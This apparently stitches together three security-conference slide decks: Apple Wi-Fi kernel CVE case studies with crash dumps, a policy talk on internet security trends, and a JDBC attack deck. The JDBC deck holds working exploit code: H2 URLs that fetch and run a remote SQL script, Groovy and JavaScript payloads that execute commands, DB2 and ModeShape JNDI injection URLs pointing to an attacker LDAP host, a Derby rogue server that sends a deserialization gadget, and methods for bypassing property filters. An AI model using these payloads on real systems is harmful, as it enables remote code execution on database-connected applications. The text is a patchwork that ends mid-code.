#define APPLE80211_IOC_ASSOC_READY_STATUS 0x175
#define APPLE80211_IOC_TXRX_CHAIN_INFO 0x176
#BHUSA @BlackHatEvents
Information Classification: General
Conclusion
- About network interfaces and attack surfaces
- About static and dynamic analysis methods
- About creating tools
- About others
1. Pay attention to the tools provided in the macOS/iOS operating system.
2. We should make full use of the apple SDKs, and contribute to Wi-Fi developer
community.
#BHUSA @BlackHatEvents
Information Classification: General
DEMO
Apple 80211 Wi-Fi subsystem fuzzing framework
on the latest macOS Ventura 13.0 Beta 4 (22A5311f)
#BHUSA @BlackHatEvents
Information Classification: General
Apple 80211 Wi-Fi Subsystem
Latest Zero-day Vulnerability Case Studies
#BHUSA @BlackHatEvents
Information Classification: General
Apple Product Security Follow-up IDs:
791541097 (CVE-2022-32837), 797421595 (CVE-2022-26761),
797590499 (CVE-2022-26762), OE089684257715 (CVE-2022-32860),
OE089692707433 (CVE-2022-32847), OE089712553931,
OE089712773100, OE0900967233115, OE0908765113017,
OE090916270706, etc.
Follow-up ID and CVE ID
#BHUSA @BlackHatEvents
Information Classification: General
CVE-2020-9899:
AirPortBrcmNIC`AirPort_BrcmNIC::setROAM_PROFILE
Kernel Stack Overflow Vulnerability
About the security content of macOS Catalina 10.15.6,
Security Update 2020-004 Mojave,
Security Update 2020-004 High Sierra
https://support.apple.com/en-us/HT211289
#BHUSA @BlackHatEvents
Information Classification: General
Two years have passed, are there still such high-quality arbitrary (kernel) memory
write vulnerabilities?
#BHUSA @BlackHatEvents
Information Classification: General
CVE-2022-32847:
AirPort_BrcmNIC::setup_btc_select_profile
Kernel Stack Overwrite Vulnerability
About the security content of iOS 15.6 and iPadOS 15.6
https://support.apple.com/en-us/HT213346
About the security content of macOS Monterey 12.5
https://support.apple.com/en-us/HT213345
About the security content of macOS Big Sur 11.6.8
https://support.apple.com/en-us/HT213344
Yes, definitely
#BHUSA @BlackHatEvents
Information Classification: General
Process 1 stopped
* thread #1, stop reason = EXC_BAD_ACCESS (code=10, address=0xd1dd0000)
frame #0: 0xffffff8005a53fbb
-> 0xffffff8005a53fbb: cmpl
$0x1, 0x18(%rbx,%rcx,4)
0xffffff8005a53fc0: cmovnel %esi, %edi
0xffffff8005a53fc3: orl
%edi, %edx
0xffffff8005a53fc5: incq
%rcx
Target 0: (kernel.kasan) stopped.
(lldb) register read
General Purpose Registers:
rax = 0x00000000481b8d16
rbx = 0xffffffb0d1dcf3f4
rcx = 0x00000000000002fd
rbp = 0xffffffb0d1dcf3e0
rsp = 0xffffffb0d1dcf3c0
rip = 0xffffff8005a53fbb AirPortBrcmNIC`AirPort_BrcmNIC::setup_btc_select_profile + 61
(lldb) bt
* thread #1, stop reason = signal SIGSTOP
* frame #0: 0xffffff8005a53fbb AirPortBrcmNIC`AirPort_BrcmNIC::setup_btc_select_profile + 61
#BHUSA @BlackHatEvents
Information Classification: General
CVE-2020-10013:
AppleBCMWLANCoreDbg
Arbitrary Memory Write Vulnerability
About the security content of iOS 14.0 and iPadOS 14.0
https://support.apple.com/en-us/HT211850
About the security content of macOS Catalina 10.15.7,
Security Update 2020-005 High Sierra,
Security Update 2020-005 Mojave
https://support.apple.com/en-us/HT211849
#BHUSA @BlackHatEvents
Information Classification: General
kernel`bcopy:
-> 0xffffff8000398082 <+18>: rep
0xffffff8000398083 <+19>: movsb
(%rsi), %es:(%rdi)
0xffffff8000398084 <+20>: retq
0xffffff8000398085 <+21>: addq
%rcx, %rdi
(lldb) register read rcx rsi rdi
General Purpose Registers:
rcx = 0x0000000000000023
rsi = 0xffffff81b1d5e000
rdi = 0xffffff80deadbeef
(lldb) bt
* thread #1, stop reason = signal SIGSTOP
* frame #0: 0xffffff8000398082 kernel`bcopy + 18
frame #1: 0xffffff800063abd4 kernel`memmove + 20
frame #2: 0xffffff7f828e1a64 AppleBCMWLANCore`AppleBCMWLANUserPrint + 260
frame #3: 0xffffff7f8292bab7 AppleBCMWLANCore`AppleBCMWLANCoreDbg::cmdSetScanIterationTimeout + 91
frame #4: 0xffffff7f82925949 AppleBCMWLANCore`AppleBCMWLANCoreDbg::dispatchCommand + 479
frame #5: 0xffffff7f828b37bd AppleBCMWLANCore::apple80211Request + 1319
#BHUSA @BlackHatEvents
Information Classification: General
1. CVE-2020-10013 is an arbitrary memory write vulnerability caused by boundary
checking errors.
2. The value to be written is predictable or controllable.
3. Combined with kernel information disclosure vulnerabilities, a complete local
EoP exploit chain can be formed. The write primitive is stable and does not require
heap Feng Shui manipulation.
CVE-2020-9833 (p44-p49):
https://i.blackhat.com/USA-20/Thursday/us-20-Wang-Dive-into-Apple-IO80211FamilyV2.pdf
4. This vulnerability affects hundreds of AppleBCMWLANCoreDbg handlers!
Summary of case #3
#BHUSA @BlackHatEvents
Information Classification: General
Two years have passed, are there still such high-quality arbitrary (kernel) memory
write vulnerabilities?
#BHUSA @BlackHatEvents
Information Classification: General
CVE-2022-26762:
IO80211Family`getRxRate
Arbitrary Memory Write Vulnerability
About the security content of iOS 15.5 and iPadOS 15.5
https://support.apple.com/en-us/HT213258
About the security content of macOS Monterey 12.4
https://support.apple.com/en-us/HT213257
Yes, definitely
#BHUSA @BlackHatEvents
Information Classification: General
Process 1 stopped
* thread #1, stop reason = signal SIGSTOP
frame #0: 0xffffff8008b23ed7 IO80211Family`getRxRate + 166
IO80211Family`getRxRate:
-> 0xffffff8008b23ed7 <+166>: movl
%eax, (%rbx)
0xffffff8008b23ed9 <+168>: xorl
%eax, %eax
0xffffff8008b23edb <+170>: movq
0xca256(%rip), %rcx
0xffffff8008b23ee2 <+177>: movq
(%rcx), %rcx
Target 2: (kernel) stopped.
(lldb) register read
General Purpose Registers:
rax = 0x0000000000000258
rbx = 0xdeadbeefdeadcafe
rip = 0xffffff8008b23ed7 IO80211Family`getRxRate + 166
(lldb) bt
* thread #1, stop reason = signal SIGSTOP
* frame #0: 0xffffff8008b23ed7 IO80211Family`getRxRate + 166
frame #1: 0xffffff8008af9326 IO80211Family`IO80211Controller::_apple80211_ioctl_getLegacy + 70
frame #2: 0xffffff8008b14adc IO80211Family`IO80211SkywalkInterface::performGatedCommandIOCTL + 274
#BHUSA @BlackHatEvents
Information Classification: General
1. Compared with CVE-2020-10013, the root cause of CVE-2022-26762 is simpler:
the vulnerable kernel function forgets to sanitize user-mode pointer. These simple
and stable kernel Vulnerabilities are powerful, they are perfect for Pwn2Own.
2. The value to be written is fixed. The write primitive is stable and does not require
heap Feng Shui manipulation.
3. Kernel vulnerabilities caused by copyin/copyout, copy_from_user/copy_to_user,
ProbeForRead/ProbeForWrite are very common.
4. All inputs are potentially harmful.
Summary of case #4
#BHUSA @BlackHatEvents
Information Classification: General
CVE-2022-32860 and CVE-2022-32837
Kernel Out-of-bounds Read and Write Vulnerability
About the security content of iOS 15.6 and iPadOS 15.6
https://support.apple.com/en-us/HT213346
About the security content of macOS Monterey 12.5
https://support.apple.com/en-us/HT213345
About the security content of macOS Big Sur 11.6.8
https://support.apple.com/en-us/HT213344
#BHUSA @BlackHatEvents
Information Classification: General
#BHUSA @BlackHatEvents
Information Classification: General
CVE-2022-26761:
IO80211AWDLPeerManager::updateBroadcastMI
Out-of-bounds Read and Write Vulnerability caused by Type Confusion
About the security content of macOS Monterey 12.4
https://support.apple.com/en-us/HT213257
About the security content of macOS Big Sur 11.6.6
https://support.apple.com/en-us/HT213256
#BHUSA @BlackHatEvents
Information Classification: General
Takeaways and The End
#BHUSA @BlackHatEvents
Information Classification: General
From the perspective of kernel development
1. Apple has made a lot of efforts, and the security of macOS/iOS has been
significantly improved.
2. All inputs are potentially harmful, kernel developers should carefully check all
input parameters.
3. New features always mean new attack surfaces.
4. Callback functions, especially those that support different architectures or working
modes, and state machine, exception handling need to be carefully designed.
5. Corner cases matter.
#BHUSA @BlackHatEvents
Information Classification: General
From the perspective of vulnerability research
1. Arbitrary kernel memory write vulnerabilities represented by CVE-2022-26762 are
powerful, they are simple and stable enough.
2. Combined with kernel information disclosure vulnerabilities such as CVE-2020-
9833, a complete local EoP exploit chain can be formed.
3. Stack out-of-bounds read and write vulnerabilities represented by CVE-2022-
32847 are often found. The root cause is related to stack-based variables being
passed and used for calculation or parsing. The stack canary can't solve all the
problems.
#BHUSA @BlackHatEvents
Information Classification: General
From the perspective of vulnerability research (cont)
4. Vulnerabilities represented by CVE-2022-26761 indicate that handlers that
support different architectures or working modes are prone to problems.
5. Vulnerabilities represented by CVE-2020-9834 and Follow-up ID
OE0908765113017 indicate that some handlers with complex logic will be
introduced with new vulnerabilities every once in a while, even if the old ones have
just been fixed.
#BHUSA @BlackHatEvents
Information Classification: General
From the perspective of engineering and hunting
1. It is important to integrate subsystem interfaces at different levels and their attack
surfaces.
2. It is important to integrate KASAN and code coverage analysis tools.
3. Many work needs to be ported to Apple Silicon platform, such as Kemon.
4. We should combine all available means such as reverse engineering, kernel
debugging, XNU resources, Apple SDKs, third-party tools, etc.
5. If you've done this, or just started, you'll find that Apple did a lot of work, but the
results seem to be similar to 2020.
#BHUSA @BlackHatEvents
Information Classification: General
Q&A
wang yu
Cyberserval | pdf |
SAVING THE INTERNET
Jay Healey
@Jason_Healey
Atlantic Council
1.
Shift in people demographics – different nations, different values and
relationship of millenials
2.
Shift in device and computing demographics – massive uptick in devices (IoT
and IoE), change in how people connect (mobile), change in how and where
computing is done (cloud, quantum, wearable and embedded)
3.
Massive growth in data – big data, analytics, universal telemetry from IOT
4.
Growing tech and policy challenges – Moore’s Law? Network neutrality
5.
Breakdown of governance – walled gardens, increase of national borders,
decreasing trust, lack of large-scale crisis management mechanisms
6.
Continuing attacker and offense advantage over defense – O>D
The Large Internet Trends
Cyberspace…
Domain of Warfare – or Not?
A global domain within the information environment consisting of the
interdependent network of information technology infrastructures and resident data,
including the Internet, telecommunications networks, computer systems, and embedded processors
and controllers
Although cyberspace is a man-made domain, it has
become just as critical to military operations as land,
sea, air, and space. As such, the military must be able to
defend and operate within it.
- Bill Lynn, then-Deputy Secretary of Defense
By increasingly equating
“cyber” with “national
security” the Washington
policy community has
militarized the underlying
resource, the Internet
~1436
~1454
“If there is something you know,
communicate it.
If there is something you don't
know, search for it.”
Violates Privacy? Civil Liberties?
Legal? Constitutional?
“If there is something you
know, communicate it.
If there is something you
don't know, search for it.”
Global Internet Users
1993: 14 million
2003: 778 million
2013: 2.7 billion
2030?
2280?
Data breaches
Cyber crime
Anonymous
Malware
Espionage
State-sponsored attacks
Stuxnet
Heartbleed
Erection of borders
…
…
…
Privacy
Civil Liberties
Security
sep
Future Economic and
National Security
Today’s National
Security
Today’s National
Security
Future Possibilities
Until the End of
Humankind
Today’s National
Security
How many future Renaissances and
Enlightenments will humanity miss
if we – all of us, for any purpose – keep
treating the Internet as a place for crime,
warfare and espionage?
SAVING FOR WHOM?
Saving … for Whom?
Sustainable for future generations
Not just five years or fifty but two hundred and
fifty
Especially as some of the most innovative
technologies in our near future must have
strong security for us to unlock them without
resulting disaster
2014
2024
2034
2074
2274
SECURITY FROM WHAT
Saving … from What?
Obvious Stuff
Global Shocks
Tipping Point
Global Shocks
Initiated or Amplified Through the Internet
“As society becomes more
technologic, even the mundane
comes to depend on distant
digital perfection.”
Dan Geer
“This increasingly tight coupling of the
internet with the real economy and society
means a full-scale cyber shock is far more
likely to occur.”
“Beyond Data Breaches: Global
Interconnections of Cyber Risk”
Bad Guys Finish First
“Few
if
any
contemporary
computer
security controls have prevented a [red
team]
from
easily
accessing
any
information sought.”
Lt Col Roger Schell (USAF) in 1979
Bad Guys Finish First
“Few
if
any
contemporary
computer
security controls have prevented a [red
team]
from
easily
accessing
any
information sought.”
O>D
Doesn’t Have to Stay This Way
Great News! Security is Getting Better!
Whether in detection, control, or prevention, we are notching
personal bests…
- Dan Geer, 2014
Time
Effectiveness
2014
Improvement of Defense
Bad News! We’re Still Losing and at a Faster
Rate!
Time
Effectiveness
Improvement of Defense
2014
Whether in detection, control, or prevention, we are notching
personal bests but all the while the opposition is setting world
records.
Dan Geer, 2014
Improvement of Offense
“Wild West”
Or Is It Exponentially Worse?
Time
Effectiveness
Improvement of Defense
2014
Improvement of Offense
Can This Last Forever?
Time
Effectiveness
Improvement of Defense
2014
Improvement of Offense
Tipping Point?
When Will There Be More Predators Than Prey?
Time
Effectiveness
2014
O>D
O>>D
“Somalia”
“Wild West”
Tipping Point?
SOLUTIONS
D>O
D>>O
Private-Sector
Centric Approach
Single Cyber
Strategy
• Disruptive Defensive Technologies … but only if they work at scale!
• Sustainable
Cyberspace
• Working at Scale
Solutions
What will you do?
Are you sure you’re really helping?
Twitter: @Jason_Healey
Questions? | pdf |
Make JDBC Attack Brilliant Again
Chen Hongkun(@Litch1) | Xu Yuanzhen(@pyn3rd)
TRACK 2
Your Designation, Company Name Here
1.The derivation of JDBC
attacking
2.In-depth analysis of occurred implementations
3.Set fire on JDBC of diverse applications
Agenda
1.The derivation of JDBC
attacking
2.In-depth analysis of occurred implementations
3.Set fire on JDBC of diverse applications
Agenda
Java Database Connectivity
What is the JDBC?
JDBCMysqlImpl
MySQL
JDBC
JDBCOracleImpl
JDBCSQLServerIm
pl
JDBCDB2mpl
Oracle
MsSQL
DB2
JDBC Driver
Standard Interface
Callback
Java Application
Not Recommended
Unportable
Callback
set evil JDBC URL
establish JDBC connection
execute payload with JDBC driver
Controllable JDBC URL
Class.forName(" com.mysql.cj.jdbc.Driver");
String url = "jdbc:mysql://localhost:3306/hitb"
Connection conn = DriverManager.getConnection(url)
1.The derivation of JDBC
attacking
2.In-depth analysis of occurred implementations
3.Set fire on JDBC of diverse applications
Agenda
Agenda
MySQL Client Arbitrary File Reading Vulnerability
• Affect many clients including JDBC driver
• LOAD DATA LOCAL INFILE statement
establish JDBC connection
greeting packet
query packet
file transfer packet
Server
Client
MySQL JDBC Client Deserialization Vulnerability
establish JDBC connection
read evil object from server
deserialize evil object
• Affected MySQL JDBC driver need to support specific properties
• gadgets are necessary
Server
Client
MySQL Connector/J – CVE-2017-3523
MySQL Connector/J offers features to support for automatic serialization
and deserialization of Java objects, to make it easy to store arbitrary
objects in the database
The flag "useServerPrepStmts" is set true to make MySQL Connector/J use
server-side prepared statements
The application is reading from a column having type BLOB, or the similar
TINYBLOB, MEDIUMBLOB or LONGBLOB
The application is reading from this column using .getObject() or one of
the functions reading numeric values (which are first read as strings and
then parsed as numbers).
if (field.isBinary() || field.isBlob()) {
byte[] data = getBytes(columnIndex);
if (this.connection.getAutoDeserialize()) {
Object obj = data;
if ((data != null) && (data.length >= 2)) {
if ((data[0] == -84) && (data[1] == -19)) {
// Serialized object?
try {
ByteArrayInputStream bytesIn = new ByteArrayInputStream(data);
ObjectInputStream objIn = new ObjectInputStream(bytesIn);
obj = objIn.readObject();
objIn.close();
bytesIn.close();
} catch (ClassNotFoundException cnfe) {
throw SQLError.createSQLException(Messages.getString("ResultSet.Class_not_found___91") + cnfe.toString()
+ Messages.getString("ResultSet._while_reading_serialized_object_92"), getExceptionInterceptor());
} catch (IOException ex) {
obj = data; // not serialized?
}
} else {
return getString(columnIndex);
}
}
return obj;
}
return data;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Properties
Properties
queryInterceptors
Versions
8.x
6.x
statementInterceptors
com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
>=5.1.11
<=5.1.10
statementInterceptors
com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor
com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor
com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
Values
statementInterceptors
Scenarios
• New Gadgets
• Attack SpringBoot Actuator
• API Interfaces Exposure
• Phishing, Honeypot
……
public class CreateJDBCDataSource extends CreatePageFLowController {
private static final Long serialVersionUID = 1L;
private static Log LOG = LogFactory.getLog(CreateJDBCDataSource.class);
protected CreateJDBCDataSourceForm _createJDBCDataSourceForm = null;
@Action(useFormBean =
"createJDBCDataSourceForm", forwards = {@Forward(name="success", path="start.do")})
public Forward begin(CreateJDBCDataSourceForm form) {
UsageRecorder.note("User has launched the <CreateJDBCDataSource> assistant");
if (!isNested())
this._createJDBCDataSourceForm = form = new CreateJDBCDataSourceForm( );
form.setName(getUniqueName("jdbc.datasources.createidbcdatasource.name. seed"));
form.setDatasourceType("GENERIC")
form.setCSRFToken(CSRFUtils.getSecret(getRequest()));
try {
ArrayListsLabelvalueBean > databaseTypes = getDatabaseTypes();
form.setDatabaseTypes(databaseTypes);
for (Iterator<LabelValueBean> iter = databaseTypes.iterator(); iter.hasNext(); ) {
LabelvalueBean lvb = iter.next();
if (lvb.getvalue().equals("Oracle")) {
form.setSelectedDatabaseType(lvb.getValue());
break
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Weblogic Case - CVE-2020-2934
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
Spring Boot H2 console Case Study
jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8000/poc.sql'
JBoss/Wildfly Case
H2 RCE
How to bypass the restriction of network?
jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8000/poc.sql'
Construct payload with Groovy AST Transformations
Why we use command "RUNSCRIPT"?
INIT = RUNSCRIPT FROM 'http://ip:port/poc.sql'
single line SQL
if (init != null) {
try {
CommandInterface command = session.prepareCommand(init,
Integer.MAX_VALUE);
command.executeUpdate(null);
} catch (DbException e) {
if (!ignoreUnknownSetting) {
session.close();
throw e;
}
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
In-depth analysis of source code
CREATE ALIAS RUNCMD AS $$<JAVA METHOD>$$;
CALL RUNCMD(command)
org.h2.util.SourceCompiler
javax.tools.JavaCompiler#getTask
javax.script.Compilable#compile
groovy.lang.GroovyCodeSource#parseClass
Java Source Code
JavaScript Source Code
Groovy Source Code
multiple lines SQL
Class<?> compiledClass = compiled.get(packageAndClassName);
if (compiledClass != null) {
return compiledClass;
}
String source = sources.get(packageAndClassName);
if (isGroovySource(source)) {
Class<?> clazz = GroovyCompiler.parseClass(source, packageAndClassName);
compiled.put(packageAndClassName, clazz);
return clazz;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Groovy Source Code
public static void main (String[] args) throws ClassNotFoundException, SQLException {
String groovy = "@groovy.transform.ASTTest(value={" +
" assert java.lang.Runtime.getRuntime().exec(\"open -a Calculator\")" +
"})" +
"def x";
String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '"+ groovy +
"'";
Connection conn = DriverManager.getConnection(url);
conn.close();
use @groovy.transform.ASTTEST to perform assertions on the AST
GroovyClassLoader.parseClass(…)
Groovy dependency is necessary?
private Trigger loadFromSource() {
SourceCompiler compiler = database.getCompiler();
synchronized (compiler) {
String fullClassName = Constants.USER_PACKAGE + ".trigger." + getName();
compiler.setSource(fullClassName, triggerSource);
try {
if (SourceCompiler.isJavaxScriptSource(triggerSource)) {
return (Trigger) compiler.getCompiledScript(fullClassName).eval();
} else {
final Method m = compiler.getMethod(fullClassName);
if (m.getParameterTypes().length > 0) {
throw new IllegalStateException("No parameters are allowed for a
trigger");
}
return (Trigger) m.invoke(null);
}
} catch (DbException e) {
throw e;
} catch (Exception e) {
throw DbException.get(ErrorCode.SYNTAX_ERROR_1, e, triggerSource);
}
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
"CREATE TRIGGER" NOT only compile but also invoke eval
public static void main (String[] args) throws ClassNotFoundException, SQLException {
String javascript = "//javascript\njava.lang.Runtime.getRuntime().exec(\"open -a Calculat
or\")";
String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER hhhh BEFORE SELECT ON
INFORMATION_SCHEMA.CATALOGS AS '"+ javascript +"'";
Connection conn = DriverManager.getConnection(url);
conn.close();
1.The derivation of JDBC
attacking
2.In-depth analysis of occurred implementations
3.Set fire on JDBC of diverse applications
Agenda
Agenda
IBM DB2 Case
clientRerouteServerListJNDINameIdentifies
a JNDI reference to a DB2ClientRerouteServerList instance in a JNDI repository of
reroute server information.clientRerouteServerListJNDIName applies only to IBM Data
Server Driver for JDBC and SQLJ type 4 connectivity, and to connections that are
established through the DataSource interface.
If the value of clientRerouteServerListJNDIName is not null,
clientRerouteServerListJNDIName provides the following functions:
•
Allows information about reroute servers to persist across JVMs
•
Provides an alternate server location if the first connection to the data source fails
public class c0 impLements PrivilegedExceptionAction {
private Context a = null;
private String b;
public c0(Context var1, String var2) {
this.a = var1;
this.b = var2;
}
public Object run() throws NamingException {
return this.a.Lookup(this.b);
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Pursue Root Cause
Pursue Root Cause
Set JDBC URL
Connect Succeeded
Lookup ServerList
Load Remote Codebase
Connect Failed
JDNI Injection RCE
Database
Manipulation
Make JNDI Injection RCE
clientRerouteServerListJNDIName = ldap://127.0.0.1:1389/evilClass;
public class DB2Test {
public static void main(String[] args) throws Exception {
Class.forName("com.ibm.db2.jcc.DB2Driver");
DriverManager.getConnection("jdbc:db2://127.0.0.1:50001/BLUDB:clientRerouteServerListJNDIName=
ldap://127.0.0.1:1389/evilClass;");
}
}
Java Content Repository
Implementations
Jackrabbit (Apache)
CRX (Adobe)
ModeShape
eXo Platform
Oracle Beehive
ModeShape
• JCR 2.0 implementation
• Restful APIs
• Sequencers
• Connectors
• …
JCR Connectors
Use JCR API to access data from other systems
E.g. filesystem, Subversion, JDBC metadata…
?
ModeShape
JCR Repository
JCR Client
Application
ModeShape Gadget
JCR Repositories involving JDBC
public class ModeShapeTest {
public static void main(String[] args) throws Exception {
Class.forName("org.modeshape.jdbc.LocalJcrDriver");
DriverManager.getConnection("jdbc:jcr:jndi:ldap://127.0.0.1:1389/evilClass");
}
}
• A JNDI URL that points the hierarchical database to an existing repository
• A JNDI URL that points the hierarchical database to an evil LDAP service
jdbc:jcr:jndi:ldap://127.0.0.1:1389/evilClass
jdbc:jcr:jndi:jcr:?repositoryName=repository
public class Socketconnection {
private final Socket socket;
private final ObjectOutputStream objOutputStream;
Private final ObjectInputstream objInputStream;
public SocketConnection(Socket var1) throws IOException {
this.socket = var1;
this.objOutputStream = new ObjectOutputStream(var1.getOutputStream());
this.objInputStream = new ObjectInputStream(var1.getInputStream());
}
public Object readMessage() throws cLassNotFoundException, IOException {
return this.objInputStream.readObject();
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Apache Derby
private class MasterReceiverThread extends Thread {
private final ReplicationMessage pongMsg = new ReplicationMessage(14, (Object)null);
MasterReceiverThread(String var2) {
super("derby.master.receiver-" + var2);
}
public void run() {
while(!ReplicationMessageTransmit.this.stopMessageReceiver) {
try {
ReplicationMessage var1 = this.readMessage();
switch(var1.getType()) {
case 11:
case 12:
synchronized(ReplicationMessageTransmit.this.receiveSemaphore) {
ReplicationMessageTransmit.this.receivedMsg = var1;
ReplicationMessageTransmit.this.receiveSemaphore.notify();
break;
}
case 13:
ReplicationMessageTransmit.this.sendMessage(this.pongMsg);
}
}
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
readObject()
readMessage()
MasterReceiverThread
set JDBC URL to make target
start as MASTER meanwhile
appoint SLAVE
establish JDBC connection
read data stream from SLAVE
execute payload with JDBC driver
Master
Slave
readMessage()
startMaster=true
slaveHost=hostname
JDBC Connection
public class DerbyTest {
public static void main(String[] args) throws Exception{
Class.forName("org.apache.derby.jdbc.EmbeddedDriver");
DriverManager.getConnection("jdbc:derby:webdb;startMaster=true;slaveHost=evil_server_ip");
}
}
Evil Slave Server
public class EvilSlaveServer {
public static void main(String[] args) throws Exception {
int port = 4851;
ServerSocket server = new ServerSocket(port);
Socket socket = server.accept();
socket.getOutputStream().write(Serializer.serialize(
new CommonsBeanutils1().getObject("open -a Calculator")));
socket.getOutputStream().flush();
Thread.sleep(TimeUnit.SECONDS.toMillis(5));
socket.close();
server.close();
}
}
SQLite
If (JDBC URL is controllable) {
The database file content is controllable
}
How to exploit it?
private void open(int openModeFlags, int busyTimeout) throws SQLException {
// check the path to the file exists
if (!":memory:".equals(fileName) && !fileName.startsWith("file:") && !fileName.contains("mode=memory")) {
if (fileName.startsWith(RESOURCE_NAME_PREFIX)) {
String resourceName = fileName.substring(RESOURCE_NAME_PREFIX.length());
// search the class path
ClassLoader contextCL = Thread.currentThread().getContextClassLoader();
URL resourceAddr = contextCL.getResource(resourceName);
if (resourceAddr == null) {
try {
resourceAddr = new URL(resourceName);
}
catch (MalformedURLException e) {
throw new SQLException(String.format("resource %s not found: %s", resourceName, e));
}
}
try {
fileName = extractResource(resourceAddr).getAbsolutePath();
}
catch (IOException e) {
throw new SQLException(String.format("failed to load %s: %s", resourceName, e));
}
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
else {
// remove the old DB file
boolean deletionSucceeded = dbFile.delete();
if (!deletionSucceeded) {
throw new IOException("failed to remove existing DB file: " + dbFile.getAbsolutePath());
}
}
}
byte[] buffer = new byte[8192]; // 8K buffer
FileOutputStream writer = new FileOutputStream(dbFile);
InputStream reader = resourceAddr.openStream();
try {
int bytesRead = 0;
while ((bytesRead = reader.read(buffer)) != -1) {
writer.write(buffer, 0, bytesRead);
}
return dbFile;
}
finally {
writer.close();
reader.close();
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
controllable SQLite DB & uncontrollable select code
Class.forName("org.sqlite.JDBC");
c=DriverManager.getConnection(url);
c.setAutoCommit(true);
Statement statement = c.createStatement();
statement.execute("SELECT * FROM security");
Utilize "CREATE VIEW" to convert uncontrollable SELECT to controllable
Trigger sub-query-1 and sub-query-2
CREATE VIEW security AS SELECT (<sub-query-1>), (<sub-query-2>)
Load extension with a controllable file?
"
protected CoreConnection(String url, String fileName, Properties prop) throws SQLException
{
this.url = url;
this.fileName = extractPragmasFromFilename(fileName, prop);
SQLiteConfig config = new SQLiteConfig(prop);
this.dateClass = config.dateClass;
this.dateMultiplier = config.dateMultiplier;
this.dateFormat = FastDateFormat.getInstance(config.dateStringFormat);
this.dateStringFormat = config.dateStringFormat;
this.datePrecision = config.datePrecision;
this.transactionMode = config.getTransactionMode();
this.openModeFlags = config.getOpenModeFlags();
open(openModeFlags, config.busyTimeout);
if (fileName.startsWith("file:") && !fileName.contains("cache="))
{ // URI cache overrides flags
db.shared_cache(config.isEnabledSharedCache());
}
db.enable_load_extension(config.isEnabledLoadExtension());
// set pragmas
config.apply((Connection)this);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
public class SqliteTest {
pubtic static void main(String args[]) {
Connection c = null;
String url= "jdbc:sqlite::resource:http://127.0.0.1:8888/poc.db";
try {
Class.forName("org.sqlite.JDBC");
c = DriverManager.getconnection(url);
c.setAutoCommit(true);
Statement statement = c.createStatement();
statement.execute("SELECT * FROM security");
} catch (Exception e) {
System.err.println(e.getClass().getName() + ": " + e.getMessage());
System.exit(0);
}
}
Use memory corruptions in SQLite such "Magellan"
properties filter for bug fix
Apache Druid CVE-2021-26919 Patch
public static void throwIfPropertiesAreNotAllowed(
Set<String> actualProperties,
Set<String> systemPropertyPrefixes,
Set<String> allowedProperties
)
{
for (String property : actualProperties) {
if
(systemPropertyPrefixes.stream().noneMatch(property::startsWith)) {
Preconditions.checkArgument(
allowedProperties.contains(property),
"The property [%s] is not in the allowed list %s",
property, allowedProperties
);
}
}
}
Apache DolphinScheduler CVE-2020-11974 Patch
private final Logger logger = LoggerFactory.getLogger(MySQLDataSource.class);
private final String sensitiveParam = "autoDeserialize=true";
private final char symbol = '&';
/**
* gets the JDBC url for the data source connection
* @return jdbc url
return DbType.MYSQL;
}
@Override
protected String filterOther(String other){
if (other.contains(sensitiveParam)){
int index = other.indexOf(sensitiveParam);
String tmp = sensitiveParam;
if (other.charAt(index-1) == symbol){
tmp = symbol + tmp;
} else if(other.charAt(index + 1) == symbol){
tmp = tmp + symbol;
}
logger.warn("sensitive param : {} in otherParams field is filtered", tmp);
other = other.replace(tmp, "");
}
New exploitable way to bypass property filter
Apache Druid Case
• MySQL Connector/J 5.1.48 is used
• Effect Apache Druid latest version
• Differences between Properties Filter Parser and JDBC Driver Parser
Apache Druid 0day Case
private static void checkConnectionURL(String url, JdbcAccessSecurityConfig securityConfig)
{
Preconditions.checkNotNull(url, "connectorConfig.connectURI");
if (!securityConfig.isEnforceAllowedProperties()) {
// You don't want to do anything with properties.
return;
}
@Nullable final Properties properties; // null when url has an invalid format
if (url.startsWith(ConnectionUriUtils.MYSQL_PREFIX)) {
try {
NonRegisteringDriver driver = new NonRegisteringDriver();
properties = driver.parseURL(url, null);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Java Service Provider Interface
java.util.ServiceLoader
com.mysql.fabric.jdbc.FabricMySQLDriver
mysql-connector-java-{VERSION}.jar
META-INF/services
java.sql.Driver
com.mysql.cj.jdbc.Driver
com.mysql.fabric.jdbc.FabricMySQLDriver
• MySQL Fabric is a system for managing a farm of MySQL servers.
• MySQL Fabric provides an extensible and easy to use system for managing a
MySQL deployment for sharding and high-availability.
Properties parseFabricURL(String url, Properties defaults) throws SQLException
{
if (!url.startsWith("jdbc:mysql:fabric://")) {
return null;
}
// We have to fudge the URL here to get NonRegisteringDriver.parseURL()
to parse it for us.
// It actually checks the prefix and bails if it's not recognized.
// jdbc:mysql:fabric:// => jdbc:mysql://
